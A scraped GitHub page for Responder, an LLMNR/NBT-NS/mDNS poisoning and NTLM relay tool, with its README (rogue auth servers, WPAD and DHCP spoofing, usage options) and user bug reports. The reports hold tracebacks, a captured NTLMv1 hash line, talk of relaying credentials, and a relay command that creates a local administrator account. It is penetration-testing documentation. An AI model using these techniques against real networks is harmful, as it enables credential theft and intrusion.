lgandx / responder

This project forked from spiderlabs/responder


Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

License: GNU General Public License v3.0


responder's Introduction

Responder/MultiRelay

IPv6/IPv4 LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay.

Author: Laurent Gaffie <[email protected]> https://g-laurent.blogspot.com

Intro

Responder is an LLMNR, NBT-NS and MDNS poisoner.

Features

  • Dual IPv6/IPv4 stack.

  • Built-in SMB Auth server.

Supports NTLMv1 and NTLMv2 hashes with Extended Security NTLMSSP by default. Successfully tested from Windows 95 to Server 2022, Samba and Mac OSX Lion. Clear text passwords are supported for NT4, and LM hashing downgrade is performed when the --lm option is set. If --disable-ess is set, extended session security will be disabled for NTLMv1 authentication. SMBv2 has also been implemented and is supported by default.

  • Built-in MSSQL Auth server.

This server supports NTLMv1 and LMv2 hashes. It was successfully tested on Windows SQL Server 2005, 2008, 2012 and 2019.

  • Built-in HTTP Auth server.

This server supports NTLMv1 and NTLMv2 hashes and Basic Authentication. It was successfully tested on IE 6 to IE 11, Edge, Firefox, Chrome and Safari.

Note: This module also works for WebDAV NTLM authentication issued from Windows WebDAV clients (WebClient). You can now send your custom files to a victim.

  • Built-in HTTPS Auth server.

Same as above. The certs/ folder contains 2 default keys, including a dummy private key. This is intentional: the purpose is to have Responder working out of the box. A script was added in case you need to generate your own self-signed key pair.

  • Built-in LDAP Auth server.

This server supports NTLMSSP hashes and Simple Authentication (clear text authentication). It was successfully tested with the Windows support tool "ldp" and LdapAdmin.

  • Built-in DCE-RPC Auth server.

This server supports NTLMSSP hashes. It was successfully tested on Windows XP to Server 2019.

  • Built-in FTP, POP3, IMAP, SMTP Auth servers.

These modules collect clear text credentials.

  • Built-in DNS server.

This server answers type SRV and A queries. This is really handy when it's combined with ARP spoofing.

  • Built-in WPAD Proxy Server.

This module will capture all HTTP requests from anyone launching Internet Explorer on the network if they have "Auto-detect settings" enabled. This module is highly effective. You can configure your custom PAC script in Responder.conf and inject HTML into the server's responses. See Responder.conf.

  • Browser Listener

This module allows you to find the PDC in stealth mode.

  • Icmp Redirect

    python tools/Icmp-Redirect.py

For MITM on Windows XP/2003 and earlier domain members. This attack, combined with the DNS module, is pretty effective.

  • Rogue DHCP

    python tools/DHCP.py

DHCP Inform spoofing. Allows you to let the real DHCP server issue IP addresses, and then send a DHCP Inform answer to set your IP address as the primary DNS server and your own WPAD URL. To inject a DNS server, domain and route on all Windows versions and any Linux box, use -R.

  • Analyze mode.

This module allows you to see NBT-NS, BROWSER, LLMNR and DNS requests on the network without poisoning any responses. You can also passively map domains, MSSQL servers and workstations, and see whether ICMP Redirect attacks are plausible on your subnet.

Hashes

All hashes are printed to stdout and dumped in a unique John Jumbo-compliant file, using this format:

(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt

Log files are located in the "logs/" folder. Hashes will be logged and printed only once per user per hash type, unless you are using the Verbose mode (-v).

  • Responder will log all its activity to Responder-Session.log
  • Analyze mode will be logged to Analyzer-Session.log
  • Poisoning will be logged to Poisoners-Session.log

Additionally, all captured hashes are logged into an SQLite database which you can configure in Responder.conf.

Considerations

  • This tool listens on several ports: UDP 137, UDP 138, UDP 53, UDP/TCP 389, TCP 1433, UDP 1434, TCP 80, TCP 135, TCP 139, TCP 445, TCP 21, TCP 3141, TCP 25, TCP 110, TCP 587, TCP 3128, Multicast UDP 5355 and 5353.

  • If you run Samba on your system, stop smbd and nmbd and all other services listening on these ports.

  • For Ubuntu users:

Edit the file /etc/NetworkManager/NetworkManager.conf and comment out the line dns=dnsmasq. Then kill dnsmasq with this command (as root): killall dnsmasq -9

  • Any rogue server can be turned off in Responder.conf.

  • This tool is not meant to work on Windows.

  • For OSX, please note: Responder must be launched with an IP address for the -i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX for custom interface binding, so using -i en1 will not work. Also, to run Responder with the best experience, run the following as root:

    launchctl unload /System/Library/LaunchDaemons/com.apple.Kerberos.kdc.plist

    launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist

    launchctl unload /System/Library/LaunchDaemons/com.apple.smbd.plist

    launchctl unload /System/Library/LaunchDaemons/com.apple.netbiosd.plist

Usage

First of all, please take a look at Responder.conf and tweak it for your needs.

Running the tool:

./Responder.py [options]

Typical Usage Example:

./Responder.py -I eth0 -Pv

Options:

--version             show program's version number and exit
-h, --help            show this help message and exit
-A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                    BROWSER, LLMNR requests without responding.
-I eth0, --interface=eth0
                    Network interface to use, you can use 'ALL' as a
                    wildcard for all interfaces
-i 10.0.0.21, --ip=10.0.0.21
                    Local IP to use (only for OSX)
-6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
                    Poison all requests with another IPv6 address than
                    Responder's one.
-e 10.0.0.22, --externalip=10.0.0.22
                    Poison all requests with another IP address than
                    Responder's one.
-b, --basic           Return a Basic HTTP authentication. Default: NTLM
-d, --DHCP            Enable answers for DHCP broadcast requests. This
                    option will inject a WPAD server in the DHCP response.
                    Default: False
-D, --DHCP-DNS        This option will inject a DNS server in the DHCP
                    response, otherwise a WPAD server will be added.
                    Default: False
-w, --wpad            Start the WPAD rogue proxy server. Default value is
                    False
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                    Upstream HTTP proxy used by the rogue WPAD Proxy for
                    outgoing requests (format: host:port)
-F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
                    retrieval. This may cause a login prompt. Default:
                    False
-P, --ProxyAuth       Force NTLM (transparently)/Basic (prompt)
                    authentication for the proxy. WPAD doesn't need to be
                    ON. Default: False
--lm                  Force LM hashing downgrade for Windows XP/2003 and
                    earlier. Default: False
--disable-ess         Force ESS downgrade. Default: False
-v, --verbose         Increase verbosity.

Donation

You can contribute to this project by donating to the following $XLM (Stellar Lumens) address:

"GCGBMO772FRLU6V4NDUKIEXEFNVSP774H2TVYQ3WWHK4TEKYUUTLUKUH"

Paypal:

https://paypal.me/PythonResponder

Acknowledgments

Late Responder development has been possible because of the donations received from individuals and companies.

We would like to thank these major sponsors:

Thank you.

Copyright

NBT-NS/LLMNR Responder

Responder, a network take-over set of tools created and maintained by Laurent Gaffie.

email: [email protected]

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.


responder's Issues

Random challenge issues

Found these issues randomly

Exception happened during processing of request from ('...102', 63777)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
self.handle()
File "//Responder/servers/HTTP.py", line 269, in handle
Challenge = RandomChallenge()
File "/*/Responder/utils.py", line 32, in RandomChallenge
Challenge += NumChal[i:i+2].decode("hex")
File "/usr/lib/python2.7/encodings/hex_codec.py", line 42, in hex_decode
output = binascii.a2b_hex(input)
TypeError: Odd-length string

Searched everywhere, but couldn't find any solution.
Tried adding "strip()" to NumChal[i:i+2].decode("hex").
Errors remain the same, but another error is thrown also:

Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
[!] Fingerprint failed
self.finish_request(request, client_address)
[!] Fingerprint failed
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in __init__
172.168.9.113 - - [24/Jan/2017 07:06:28] "CONNECT microsoft.stream1.fyre.co:443 HTTP/1.1" 404 -
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

Anyone, please help.

RunFinger.py: GetHostnameAndDomainName failure on max domain length

RunFinger.py contains an issue within GetHostnameAndDomainName that will prevent proper execution of RunFinger or MultiRelay when a system uses the maximum 15 character domain/workgroup name:

def GetHostnameAndDomainName(data):
	try:
		DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])

When the maximum length domain/workgroup is used, the SMB response does not contain the standard delineation of \x00\x00\x00. As such, the Hostname will wind up empty, where the DomainJoined variable will contain the Domain concatenated with the Hostname. For example, configuring a workstation with:
workgroup: ABCDEFGHIJKLMNO
hostname: 123456789012345

$ ./tools/RunFinger.py -i 192.168.37.138
Retrieving information for 192.168.37.138...
SMB signing: False
Server Time: 2017-03-09 14:48:09
Os version: 'Windows 8.1 Enterprise 9600'
Lanman Client: 'Windows 8.1 Enterprise 6.3'
Machine Hostname: ''
This machine is part of the 'ABCDEFGHIJKLMNOAB123456789012345' domain

The function receives the following data (typecast hex):
0000008dff534d42720000000080000000000000000000000000000000003c1b000001001100000332000100041100000000010000000000fce3010079c8a0df1699d20168010848004439bab2cc928d184100420043004400450046004700480049004a004b004c004d004e004f0041423100320033003400350036003700380039003000310032003300340035000000

Logic looks for the split past [81:], however it does not exist. Instead we have:
Workgroup: 4100420043004400450046004700480049004a004b004c004d004e004f004142
Hostname: 3100320033003400350036003700380039003000310032003300340035000000

This issue prevents MultiRelay from working in situations that trigger the issue within RunFinger.py
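As an added example (not code from the Responder repository) of why the split quoted in this issue fails and how a structured parse avoids it, the following Python decodes the hex frame posted above: the naive split reproduces the reported output, while parsing by WordCount, ByteCount and the 15-character NetBIOS name bound recovers both names. The frame builder and the short names WORKGROUP/PC01 are constructed here for comparison and are not from the issue.

```python
"""Extract DomainName and ServerName from a classic SMB_COM_NEGOTIATE response
(NT LM 0.12, no extended security), using the capture from the RunFinger issue."""
import struct
from typing import Tuple

NETBIOS_HDR_LEN = 4
SMB_HDR_LEN = 32
NEGOTIATE_WORD_COUNT = 17        # parameter words in an NT LM 0.12 negotiate response
MAX_NETBIOS_NAME_CHARS = 15      # NetBIOS workgroup/host names are at most 15 chars

# The "typecast hex" frame from the issue, split by field for readability.
CAPTURE = bytes.fromhex(
    "0000008d"                                   # NetBIOS session header, length 0x8d
    "ff534d42" "72" "00000000" "80"              # \xffSMB, command 0x72, status, flags
    "0000" "0000" "0000000000000000" "0000"      # flags2, PIDHigh, signature, reserved
    "0000" "3c1b" "0000" "0100"                  # TID, PID, UID, MID
    "11"                                         # WordCount = 17
    "0000" "03" "3200" "0100" "04110000"         # dialect, sec mode, MaxMpx, MaxVcs, MaxBuf
    "00000100" "00000000" "fce30100"             # MaxRaw, session key, capabilities
    "79c8a0df1699d201" "6801" "08"               # system time, tz, EncryptionKeyLength = 8
    "4800"                                       # ByteCount = 72
    "4439bab2cc928d18"                           # 8-byte challenge
    "4100420043004400450046004700480049004a004b004c004d004e004f00"  # "ABCDEFGHIJKLMNO"
    "4142"                                       # slot where a 00 00 terminator is expected
    "310032003300340035003600370038003900300031003200330034003500"  # "123456789012345"
    "0000"
)


def naive_names(data: bytes) -> Tuple[str, str]:
    """The logic quoted from RunFinger.py, ported to bytes: split everything past
    offset 81 on 00 00 00 and strip NULs. It only works while the domain's
    00 00 terminator is really present in the frame."""
    parts = [p.replace(b"\x00", b"") for p in data[81:].split(b"\x00\x00\x00")[:2]]
    domain = parts[0]
    hostname = parts[1] if len(parts) > 1 else b""
    return domain.decode("latin-1"), hostname.decode("latin-1")


def read_name(body: bytes, off: int) -> Tuple[str, int]:
    """Read a UTF-16LE NetBIOS name at off: at most 15 code units, stopping early at
    an aligned 00 00. The 2-byte terminator slot is then skipped unconditionally,
    so a 15-char name whose slot holds junk (as in the capture) still parses."""
    units = []
    while len(units) < MAX_NETBIOS_NAME_CHARS and off + 2 <= len(body):
        unit = body[off:off + 2]
        if unit == b"\x00\x00":
            break
        units.append(unit)
        off += 2
    return b"".join(units).decode("utf-16-le"), off + 2


def negotiate_names(data: bytes) -> Tuple[str, str]:
    """Structured parse: locate the data block via WordCount/ByteCount, skip
    EncryptionKeyLength bytes of challenge, then read the two bounded names."""
    hdr = NETBIOS_HDR_LEN
    if data[hdr:hdr + 4] != b"\xffSMB" or data[hdr + 4] != 0x72:
        raise ValueError("not an SMB_COM_NEGOTIATE response")
    wc_off = hdr + SMB_HDR_LEN
    word_count = data[wc_off]
    if word_count != NEGOTIATE_WORD_COUNT:
        raise ValueError("unexpected WordCount %d" % word_count)
    key_len = data[wc_off + 2 * word_count]          # last parameter byte
    bc_off = wc_off + 1 + 2 * word_count
    (byte_count,) = struct.unpack_from("<H", data, bc_off)
    body = data[bc_off + 2:bc_off + 2 + byte_count]
    if len(body) != byte_count:
        raise ValueError("truncated frame")
    domain, off = read_name(body, key_len)
    hostname, _ = read_name(body, off)
    return domain, hostname


def build_frame(domain: str, hostname: str) -> bytes:
    """Constructed comparison frame: the capture's header and challenge with
    properly terminated names (each at most 15 chars) swapped in."""
    body_start = NETBIOS_HDR_LEN + SMB_HDR_LEN + 1 + 2 * NEGOTIATE_WORD_COUNT + 2
    head = bytearray(CAPTURE[:body_start + 8])        # header, words, ByteCount, challenge
    names = (domain.encode("utf-16-le") + b"\x00\x00"
             + hostname.encode("utf-16-le") + b"\x00\x00")
    struct.pack_into("<H", head, body_start - 2, 8 + len(names))
    frame = bytes(head) + names
    nb_len = len(frame) - NETBIOS_HDR_LEN
    return b"\x00" + nb_len.to_bytes(3, "big") + frame[NETBIOS_HDR_LEN:]


if __name__ == "__main__":
    print("15-char names, naive :", naive_names(CAPTURE))
    print("15-char names, robust:", negotiate_names(CAPTURE))
    short = build_frame("WORKGROUP", "PC01")
    print("short names, naive   :", naive_names(short))
    print("short names, robust  :", negotiate_names(short))
```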

Open to enhancement? Encrypting logs?

I'm suggesting an enhancement I'd be happy to make a pull request for or offer up to someone more experienced with the project.

Responder is capable of logging its findings in the "logs" folder. That's really helpful and useful, however if a pen tester was operating covertly (or on a machine they may lose access to) it may be concerning if that information is taken by another party.

I'd like to propose a feature supporting asymmetric cryptography of these log files. In this way a pen tester could give a public key to Responder, who would then encrypt the findings. Then, at a later time, the pen tester could move those encrypted files off the box and decrypt them on their local machine.

Any thoughts on this? Would it be alright if I submitted a pull request with these enhancements?

Work on interface which was not specified

./Responder.py -I eth1 -fwrdF
eth0 192.168.1.0/24
eth1 192.168.163.0/24

But instead of eth1, eth0 was engaged, which it should not have been.
As you will see below, Responder poisoned a subnet which it was not supposed to.
Please, correct me if I am wrong. Also I may contribute to this issue, if you help me localize the bug.

Feature Request: Add timestamp to all output

It would be nice to have a flag that automatically prefixes all output with a date timestamp:

[20161018-03:15:00 -400] - [HTTP] Sending NTLM authentication request to 192.168.1.100

OSX ports issue - mDNSResponder/Bonjour ?

OS: Mac OSX High Sierra

Sorted out most of the running services that were stopping Responder from working correctly, apart from the last few.

[!] Error starting UDP server on port 5353, check permissions or other servers running.
[!] Error starting UDP server on port 137, check permissions or other servers running.
[!] Error starting UDP server on port 138, check permissions or other servers running.
[+] Listening for events...

I believe this requires

sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist

Due to SIP being enabled this cannot be done. Is there a workaround for this?

JTR can't load any hashes :(

Responder: NBT-NS, LLMNR & MDNS Responder 2.3.3.6
John: 1.7.9 // 1.8.0

I just ran a quick test in my LAN and captured few HTTP and SMB requests.

But John can't load any hashes. Googled already, YouTubed already, no real solutions. Any help?

Samples:
HTTP-NTLMv2-192.168.2.33.txt

SMB-NTLMv1-SSP-192.168.2.241.txt
Administrator::HOST:90784AF285BB06F600000000000000000000000000000000:5389E501F8B30519F09E3AA1BEFAF7DC25EF64218A65FF10:1122334455667788

SMB-NTLMv2-SSP-192.168.2.249.txt

HTTP-NTLMv2-192.168.2.170.txt

john HTTP-NTLMv2-192.168.2.170.txt

No password hashes loaded (see FAQ)

john --format=netntlmv2 HTTP-NTLMv2-192.168.2.170.txt

Unknown ciphertext format name requested

Enhancement: Microsoft connectivity test and wpad.dat delivery, while using "Serve-Html"

I'm on a project turning a Raspberry Pi Zero into a stand-alone USB over Ethernet pawning device.
To do so the ideas of @samyk and @mubix have been extended. The project relies heavily on Responders capabilities to serve HTML content and to force authentication on requests to "wpad.dat" / "*.pac" or on Proxies after redirection based on wpad.dat.
Unfortunately these two capabilities could not be combined (if Serve-Html = On, wpad.dat doesn't get delivered, neither is authentication forced). I have added a config option to enable the described behavior, called Serve-Html-Provide-WPAD-anyway.

Additionally, I'm (mis)using Responder as a stand-alone web server with Serve-Html = On. Targeting Windows machines, there was a need to cope with Microsoft's connectivity tests (e.g. to "http://www.msftncsi.com/ncsi.txt" on Win 7). I added an option Serve-Html-Simulate-Internet to serve the correct HTTP responses to those requests, while running with Serve-Html = On.

Below is a short feature description of my (yet unreleased) project, but I think the Responder modification could be useful for everybody else, thus I'm starting a PR. Merging this would help me again to keep my project's setup script clean, as I would be able to clone from your repo without further patching.

Feature of my project (see notes on Responder)

# Notes/Features:
#       - A composite device for Ethernet over USB is presented, providing RNDIS for
#       Windows and CDC ECM for Linux/Unix
#       - The windows setup supports automatic driver installation, by adding Microsoft
#       OS Descriptors to the USB descriptor (tested on Windows 7 and Windows 10).
#       - The Setup works well on USB 2.0 Ports (only in some cases on USB3.0)
#       - The script detects if RNDIS or CDC ECM is used, by polling the link state
#       of both internal interfaces. If RNDIS (usb0) is detected to be active CDC ECM gets
#       disabled (usb1). If CDC ECM (usb1) gets link, RNDIS (usb0) will be disabled.
#       If neither one gets link both are disabled after RETRY_COUNT_LINK_DETECTION attempts.
#       - Because only one adapter is used after link detection, the DHCP setup DOESN'T
#       DIFFER BETWEEN Windows and Linux. This comes in handy if this should be used to trigger 
#       reverse connections, as the IP of the Raspberry is always known.
#       - The initial idea was to run NTLM hash stealing, as shown by MUBIX, which unfortunately
#       seems to be addressed by Microsoft with MS16-112.
#       - To allow capturing hashes anyway, the setup has been combined with Samy Kamkar's approach
#       of choosing a large IP subnet (1 Bit network mask) to capture HTTP traffic to all IPs fitting
#       into this network mask. Responder is used to answer HTTP requests with content containing
#       a SMB redirect, which lands at Responder's SMB server again and should help to capture
#       NTLM hashes in a more generic way.
#       - To behave like intended, Responder.py has been patched with the following functionality:
#               1) If "Serve-Html" is set to on, responder delivers the same Page, no matter what is requested.
#               This behavior has been changed, to deliver the Custom WPAD script if "/wpad.dat" or "/*.pac"
#               is requested.
#               2) If Responder runs without upstream (not forwarding to Internet), like in this setup, Windows
#               detects that the new network has no Internet access. An option to answer connection tests in a manner
#               to make Windows believe Internet is accessible, has been added (at time of writing only for Windows 7
#               IPv4, which checks for "http://www.msftncsi.com/ncsi.txt"). This should help to keep the network enabled
#               and traffic flowing through the raspberry.

Random challenges get mixed up in Proxy_Auth

I assumed that one Proxy_Auth instance would be created per TCP Connection. But it seems like a new Proxy_Auth instance is created per request. Therefore different Proxy_Auth instances and thus different challenges are used for packet type 0x1 and 0x3 of an NTLM authentication.
All in all the hash written to the db is wrong because the challenge is wrong.
This seems like an architectural problem. For now I use a fixed challenge to circumvent that.
I expect the HTTP module to have the same problem but I haven't confirmed that.

Maybe the default challenge should be set to a fixed value until this is fixed.

MultiRelay params parsing issue

If you specify -c after -u for MultiRelay, the entered command will show up in the user whitelist array.

Example:

./MultiRelay.py -t 172.16.60.41 -u ALL -c whoami

Relaying credentials for these users:
['ALL', 'whoami']

However, this doesn't seem to influence the behaviour of the tool.

[+] Authenticated.
[+] Running command: whoami

Feature Request: NTLM (407) Proxy Auth Required

It would be nice to have the option of turning on a setting that would switch both the proxy (3141) as well as the HTTP/S port (80/443) to push back to clients saying that they need to authenticate before accessing the website they are trying to get to. Once a cred is captured, allowing them through to the site (3141) or to the current 80/443 setup would be the preferred method.

Module object not callable

python SMBRelay.py -i [REDACTED] -c 'net user pentest [REDACTED] /add &&net localgroup administrators pentest /add' -t [REDACTED] -u Administrator

Responder SMBRelay 0.1
Please send bugs/comments to: [email protected]
Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..
Usernames to relay (-u) are case sensitive.
To kill this script hit CRTL-C or Enter
Will relay credentials for these users: Administrator

Target is running: ('Windows Server 2008 R2 Datacenter 7601 Service Pack 1', 'Windows Server 2008 R2 Datacenter 6.1')
Unhandled exception in thread started by <function RunInloop at 0x7fed3538e0c8>
Traceback (most recent call last):
File "SMBRelay.py", line 406, in RunInloop
worker = RunRelay(Target,Command,Domain)
File "SMBRelay.py", line 223, in RunRelay
s = socket(AF_INET, SOCK_STREAM)
TypeError: 'module' object is not callable

Cannot redirect to another IP

Hi,

I edited the original SpiderLabs version to do:

python Responder.py -I eth0 -wF -i 8.8.8.8

To force all requests that come to me, to poison to a value of 8.8.8.8.

:( I think changes to ICMP-redirect.py broke this.

Is there any way you fix this?

string index out of range in LLMNR.py

Hi guys,
I'm getting the following error sporadically when running responder :

Exception happened during processing of request from ('aa.bb.cc.dd', 57785)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
self.handle()
File "/home/--user--/sec/tools/Responder/poisoners/LLMNR.py", line 51, in handle
Name = Parse_LLMNR_Name(data)
File "/home/--user--/sec/tools/Responder/poisoners/LLMNR.py", line 26, in Parse_LLMNR_Name
NameLen = struct.unpack('>B',data[12])[0]
IndexError: string index out of range

Let me know what other information would be helpful

Error while running Responder

While running latest version of responder I got below error

root@kali:~/Responder# python Responder.py -I eth1

[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 10.7.1.2 for name CDE (service: File Server)

Exception happened during processing of request from ('10.7.1.2', 137)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
self.handle()
File "/root/Responder/poisoners/NBTNS.py", line 75, in handle
'AnalyzeMode': '0',
File "/root/Responder/utils.py", line 236, in SavePoisonersToDb
res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
OperationalError: no such table: Poisoned

[*] [NBT-NS] Poisoned answer sent to 10.7.1.2 for name IT (service: File Server)

Exception happened during processing of request from ('10.7.1.2', 137)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
self.handle()
File "/root/Responder/poisoners/NBTNS.py", line 75, in handle
'AnalyzeMode': '0',
File "/root/Responder/utils.py", line 236, in SavePoisonersToDb
res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
OperationalError: no such table: Poisoned

[+] Exiting...
root@kali:~/Responder#

WebDAV doesn't seem to work anymore

I thought this was working, but it seems that a request with the OPTIONS header is getting hit with an auth wall now:

OPTIONS /stuff/ HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: 192.168.1.100

Results in this:

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/6.0
Date: Wed, 12 Sep 2012 13:06:55 GMT
Content-Type: text/html
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Content-Length: 0

Missing servers/HTTPS.py file ?

I just updated Responder (from GitHub, with git pull) and in line 241 of Responder.py it is looking for servers/HTTPS.py (from servers.HTTP import HTTPS), but it is not found (ImportError: cannot import name HTTPS).
Is something missing here? A temporary workaround is to change HTTPS to Off in Responder.conf

Error when echoing commas in MultiRelay.py shell

When echoing a comma character (,) in a MultiRelay shell, an error occurs: "The command failed or took too long to complete." Escaping the character does not fix it, see screenshot. Possibly a sanitization issue?

This makes it especially hard to upgrade to a more dynamic shell because commas are often needed in powershell and vbscript scripts that are echoed into a file.


Crash when ipv6 address in resolv.conf

Responder crashes when run in analyze mode if an ipv6 nameserver is defined in /etc/resolv.conf

Traceback (most recent call last):
  File "Responder.py", line 310, in <module>
    main()
  File "Responder.py", line 225, in main
    from poisoners.LLMNR import LLMNR
  File "/home/pi/Responder/poisoners/LLMNR.py", line 45, in <module>
    IsICMPRedirectPlausible(settings.Config.Bind_To)
  File "/home/pi/Responder/poisoners/LLMNR.py", line 39, in IsICMPRedirectPlausible
    if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
  File "/home/pi/Responder/utils.py", line 56, in IsOnTheSameSubnet
    ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
ValueError: invalid literal for int() with base 10: 'xxxx:xxxx:xxx:xxxx::x'

MultiRelay Encoding Errors

Using something like './MultiRelay.py -t 172.16.60.41 -u ALL -c whoami' on a German Windows results in the following output:

Retrieving information for 172.16.60.41...
SMB signing: False
Os version: 'Windows 7 Professional 7601 Service Pack 1'
Hostname: 'PC01'
Part of the 'XXX' domain
[+] Setting up HTTP relay with SMB challenge: 9a6aa4fbb096455b
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Looks good, bob has admin rights on C$.
[+] Authenticated.
[+] Running command: whoami
nt-autorit�t\system

The last line should actually read "nt-autorität\system" (german a umlaut).

Error Using Report.py

Got the below error while running new Report.py module.

python Report.py

[+] Generating report...
[+] Unique lookups ordered by IP:
Traceback (most recent call last):
File "Report.py", line 87, in <module>
GetUniqueLookups(cursor)
File "Report.py", line 61, in GetUniqueLookups
res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
sqlite3.OperationalError: no such table: Poisoned
root@kali:~/Responder#

no Hash possible when the Username has a space in the name

Hello,
I have found maybe an issue. Currently it seems that Responder is only able to collect hashes from a single-word user name like "DemoUser"; if there is a space in the username, like "Demo User", the script tries to collect the hash from "Demo", which doesn't exist on the machine.
As a target I used a Windows 10 1607.
Sincerely
Jan

Dynamic Challenge Option

Is there any reason the challenge shouldn't be random? Or does it make more work on the cracking side?

Multi-relay suggestion

Just to drop a quick suggestion, it would be great if multirelay had an easy way to send a shell back to metasploit for a meterpreter connection.

Also I noticed today the MultiRelay 'get' option doesn't handle spaces in words; I tried various combinations of backslashes and quotes to no avail. It also doesn't seem to be able to download folders. The quote and backslash handling also contributes to my original suggestion, since I couldn't manage to send complex PowerShell commands through the MultiRelay shell.

"Exception happened during processing of request"

Hey there!

I was so pumped to try the new version of Responder that I rebuilt my Kali box and did nothing but the full rounds of apt-get update/upgrade to have the latest/greatest everything.

With the new Responder, what I'm finding is regardless of which mode I run it in, after any event happens I get a long "Exception happened..." error. I scanned the README and don't think I'm missing any pre-reqs or config steps. But I'll look at everything again and reply if it turns out to be PEBCAK :-)

respond-to-this

MultiRelay should ignore machine accounts

If you use the -u ALL switch, MultiRelay should know to ignore usernames ending in $. In my experience, these are "machine hashes", and I've never seen them be usable to gain access to a system. It's just noise and authentication failures to send them at all as far as I can tell. (If this understanding is wrong, please correct me. I've never found any tutorials or guides that utilize the machine hash to compromise a system.)

feature request: run Responder without poisoners

Would it be possible to add a command line switch to have Responder only spin up the credential stealing services and not poison the LAN? This would make using Responder for phishing so much easier.

MultiRelay continues to relay same user hashes despite "Not forwarding anymore to prevent account lockout"

I cannot confirm that we experienced account lockouts because of MultiRelay, only that we were experiencing account lockouts while running it.

Notice that the REDACTED user returned logon_failure and said "Not forwarding anymore to prevent account lockout" yet it continues to forward that account:

[+] Setting up HTTP relay with SMB challenge: 47f6d8ef79000000
[+] Received NTLMv2 hash from: 10.11.1.159
[+] Client info: ['indows 8.1 Enterprise 9600', domain: 'REDACTED', signing:'False']
[+] Username: REDACTED is whitelisted, forwarding credentials.
[+] User REDACTED\REDACTED previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout

[+] Setting up HTTP relay with SMB challenge: 19ff304ed7000000
[+] Received NTLMv2 hash from: 10.11.1.159
[+] Client info: ['indows 8.1 Enterprise 9600', domain: 'REDACTED', signing:'False']
[+] Username: REDACTED is whitelisted, forwarding credentials.
[+] User REDACTED\REDACTED previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout

MultiRelay: Unable to pwn IP if target_ip==request_source

Hi there,

if the MultiRelay target IP is the same IP as the request source, I'm unable to pwn the host. From my understanding, this should still work, if the user got the right permissions (which he does in my case (domadmin)). Any idea why this fails? I didn't get any events in the Events Logs or any other kind of error. It just hangs at "SMB Session Auth sent."

Example:

Retrieving information for 172.16.60.43...
SMB signing: False
Os version: 'Windows 7 Professional 7601 Service Pack 1'
